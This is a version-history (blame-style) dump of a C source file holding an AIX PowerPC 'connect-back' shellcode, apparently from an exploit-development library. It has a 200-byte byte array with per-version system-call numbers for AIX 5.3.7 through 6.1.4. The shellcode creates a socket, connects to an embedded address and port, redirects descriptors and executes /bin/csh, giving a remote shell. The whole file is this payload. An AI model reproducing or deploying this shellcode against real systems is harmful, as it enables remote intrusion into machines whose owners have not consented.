2008-10-10 18:23:18 +00:00
|
|
|
/*
|
2010-05-23 20:01:11 +00:00
|
|
|
* aix-power-cntsockcode.c
|
2008-10-10 18:23:18 +00:00
|
|
|
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
|
|
|
|
*
|
|
|
|
* This library is free software; you can redistribute it and/or
|
|
|
|
* modify it under the terms of the GNU Lesser General Public
|
|
|
|
* License as published by the Free Software Foundation; either
|
|
|
|
* version 2.1 of the License, or (at your option) any later version.
|
|
|
|
*
|
|
|
|
* This library is distributed in the hope that it will be useful,
|
|
|
|
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
|
|
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
|
|
* Lesser General Public License for more details.
|
|
|
|
*
|
|
|
|
* You should have received a copy of the GNU Lesser General Public
|
|
|
|
* License along with this library; if not, write to the Free Software
|
|
|
|
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
|
|
|
|
*
|
|
|
|
*/
|
|
|
|
|
|
|
|
/*
|
2010-05-23 20:01:11 +00:00
|
|
|
* Supported AIX versions:
|
|
|
|
*
|
|
|
|
* -DAIX614 AIX Version 6.1.4
|
|
|
|
* -DAIX613 AIX Version 6.1.3
|
|
|
|
* -DAIX612 AIX Version 6.1.2
|
|
|
|
* -DAIX611 AIX Version 6.1.1
|
|
|
|
* -DAIX5310 AIX Version 5.3.10
|
|
|
|
* -DAIX539 AIX Version 5.3.9
|
|
|
|
* -DAIX538 AIX Version 5.3.8
|
|
|
|
* -DAIX537 AIX Version 5.3.7
|
2008-10-10 18:23:18 +00:00
|
|
|
*
|
|
|
|
*/
|
|
|
|
|
|
|
|
#define CNTSOCKADDR 32
|
|
|
|
#define CNTSOCKPORT 30
|
|
|
|
|
2010-05-23 20:01:11 +00:00
|
|
|
char cntsockcode[]= /* 200 bytes */
|
2008-10-10 18:23:18 +00:00
|
|
|
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
|
|
|
|
"\x40\x82\xff\xfd" /* bnel <cntsockcode> */
|
|
|
|
"\x7f\xc8\x02\xa6" /* mflr r30 */
|
|
|
|
"\x3b\xde\x01\xff" /* cal r30,511(r30) */
|
|
|
|
"\x3b\xde\xfe\x25" /* cal r30,-475(r30) */
|
|
|
|
"\x7f\xc9\x03\xa6" /* mtctr r30 */
|
|
|
|
"\x4e\x80\x04\x20" /* bctr */
|
|
|
|
"\xff\x02\x04\xd2" /* .long 0xff0204d2 */
|
|
|
|
"\x7f\x00\x00\x01" /* .long 0x7f000001 */
|
|
|
|
"\x4c\xc6\x33\x42" /* crorc 6,6,6 */
|
|
|
|
"\x44\xff\xff\x02" /* svca 0 */
|
|
|
|
"\x3b\xde\xff\xf8" /* cal r30,-8(r30) */
|
2010-05-23 20:01:11 +00:00
|
|
|
"\x3b\xa0\x07\xff" /* lil r29,2047 */
|
|
|
|
"\x38\x9d\xf8\x02" /* cal r4,-2046(r29) */
|
|
|
|
"\x38\x7d\xf8\x03" /* cal r3,-2045(r29) */
|
|
|
|
#ifdef AIX614
|
|
|
|
"\x38\x5d\xf8\xf4" /* cal r2,-1804(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX613
|
|
|
|
"\x38\x5d\xf8\xef" /* cal r2,-1809(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX612
|
|
|
|
"\x38\x5d\xf8\xef" /* cal r2,-1809(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX611
|
|
|
|
"\x38\x5d\xf8\xec" /* cal r2,-1812(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX610
|
|
|
|
"\x38\x5d\xf8\xec" /* cal r2,-1812(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX5310
|
|
|
|
"\x38\x5d\xf8\xda" /* cal r2,-1830(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX539
|
|
|
|
"\x38\x5d\xf8\xda" /* cal r2,-1830(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX538
|
|
|
|
"\x38\x5d\xf8\xda" /* cal r2,-1830(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX537
|
|
|
|
"\x38\x5d\xf8\xda" /* cal r2,-1830(r29) */
|
|
|
|
#endif
|
|
|
|
|
2008-10-10 18:23:18 +00:00
|
|
|
"\x7f\xc9\x03\xa6" /* mtctr r30 */
|
|
|
|
"\x4e\x80\x04\x21" /* bctrl */
|
|
|
|
"\x7c\x7c\x1b\x78" /* mr r28,r3 */
|
2010-05-23 20:01:11 +00:00
|
|
|
"\x38\xbd\xf8\x11" /* cal r5,-2031(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
"\x38\x9e\xff\xf8" /* cal r4,-8(r30) */
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX614
|
|
|
|
"\x38\x5d\xf8\xf5" /* cal r2,-1803(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX613
|
|
|
|
"\x38\x5d\xf8\xf0" /* cal r2,-1808(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX612
|
|
|
|
"\x38\x5d\xf8\xf0" /* cal r2,-1808(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX611
|
|
|
|
"\x38\x5d\xf8\xed" /* cal r2,-1811(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX610
|
|
|
|
"\x38\x5d\xf8\xed" /* cal r2,-1811(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX5310
|
|
|
|
"\x38\x5d\xf8\xdb" /* cal r2,-1829(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX539
|
|
|
|
"\x38\x5d\xf8\xdb" /* cal r2,-1829(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX538
|
|
|
|
"\x38\x5d\xf8\xdb" /* cal r2,-1829(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX537
|
|
|
|
"\x38\x5d\xf8\xdb" /* cal r2,-1829(r29) */
|
|
|
|
#endif
|
|
|
|
|
2008-10-10 18:23:18 +00:00
|
|
|
"\x7f\xc9\x03\xa6" /* mtctr r30 */
|
|
|
|
"\x4e\x80\x04\x21" /* bctrl */
|
2010-05-23 20:01:11 +00:00
|
|
|
"\x3b\x7d\xf8\x03" /* cal r27,-2045(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
"\x7f\x63\xdb\x78" /* mr r3,r27 */
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX614
|
|
|
|
"\x38\x5d\xf9\x17" /* cal r2,-1769(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX613
|
|
|
|
"\x38\x5d\xf9\x11" /* cal r2,-1775(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX612
|
|
|
|
"\x38\x5d\xf9\x11" /* cal r2,-1775(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX611
|
|
|
|
"\x38\x5d\xf9\x0e" /* cal r2,-1778(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX610
|
|
|
|
"\x38\x5d\xf9\x0e" /* cal r2,-1778(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX5310
|
|
|
|
"\x38\x5d\xf8\xf6" /* cal r2,-1802(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX539
|
|
|
|
"\x38\x5d\xf8\xf6" /* cal r2,-1802(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX538
|
|
|
|
"\x38\x5d\xf8\xf6" /* cal r2,-1802(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX537
|
|
|
|
"\x38\x5d\xf8\xf6" /* cal r2,-1802(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
|
2008-10-10 18:23:18 +00:00
|
|
|
"\x7f\xc9\x03\xa6" /* mtctr r30 */
|
|
|
|
"\x4e\x80\x04\x21" /* bctrl */
|
|
|
|
"\x7f\x65\xdb\x78" /* mr r5,r27 */
|
|
|
|
"\x7c\x84\x22\x78" /* xor r4,r4,r4 */
|
|
|
|
"\x7f\x83\xe3\x78" /* mr r3,r28 */
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX614
|
|
|
|
"\x38\x5d\xfa\x93" /* cal r2,-1389(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX613
|
|
|
|
"\x38\x5d\xfa\x85" /* cal r2,-1403(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX612
|
|
|
|
"\x38\x5d\xfa\x7c" /* cal r2,-1412(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX611
|
|
|
|
"\x38\x5d\xfa\x67" /* cal r2,-1433(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX610
|
|
|
|
"\x38\x5d\xfa\x6a" /* cal r2,-1430(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX5310
|
|
|
|
"\x38\x5d\xf9\xee" /* cal r2,-1554(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX539
|
|
|
|
"\x38\x5d\xf9\xee" /* cal r2,-1554(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX538
|
|
|
|
"\x38\x5d\xf9\xee" /* cal r2,-1554(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX537
|
|
|
|
"\x38\x5d\xf9\xee" /* cal r2,-1554(r29) */
|
|
|
|
#endif
|
|
|
|
|
2008-10-10 18:23:18 +00:00
|
|
|
"\x7f\xc9\x03\xa6" /* mtctr r30 */
|
|
|
|
"\x4e\x80\x04\x21" /* bctrl */
|
|
|
|
"\x37\x7b\xff\xff" /* ai. r27,r27,-1 */
|
|
|
|
"\x40\x80\xff\xd4" /* bge <cntsockcode+100> */
|
|
|
|
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
|
|
|
|
"\x40\x82\xff\xfd" /* bnel <cntsockcode+148> */
|
2008-11-17 10:34:26 +00:00
|
|
|
"\x7f\x08\x02\xa6" /* mflr r24 */
|
|
|
|
"\x3b\x18\x01\xff" /* cal r24,511(r24) */
|
|
|
|
"\x38\x78\xfe\x29" /* cal r3,-471(r24) */
|
|
|
|
"\x98\xb8\xfe\x31" /* stb r5,-463(r24) */
|
2008-10-10 18:23:18 +00:00
|
|
|
"\x94\xa1\xff\xfc" /* stu r5,-4(r1) */
|
|
|
|
"\x94\x61\xff\xfc" /* stu r3,-4(r1) */
|
|
|
|
"\x7c\x24\x0b\x78" /* mr r4,r1 */
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX614
|
|
|
|
"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX613
|
|
|
|
"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX612
|
|
|
|
"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX611
|
|
|
|
"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX610
|
|
|
|
"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX5310
|
|
|
|
"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */
|
2008-10-10 18:23:18 +00:00
|
|
|
#endif
|
2010-05-23 20:01:11 +00:00
|
|
|
#ifdef AIX539
|
|
|
|
"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX538
|
|
|
|
"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */
|
|
|
|
#endif
|
|
|
|
#ifdef AIX537
|
|
|
|
"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */
|
|
|
|
#endif
|
|
|
|
|
2008-10-10 18:23:18 +00:00
|
|
|
"\x7f\xc9\x03\xa6" /* mtctr r30 */
|
2010-05-23 20:01:11 +00:00
|
|
|
"\x4e\x80\x04\x21" /* bctrl */
|
2008-10-10 18:23:18 +00:00
|
|
|
"/bin/csh"
|
|
|
|
;
|
2010-05-23 20:01:11 +00:00
|
|
|
|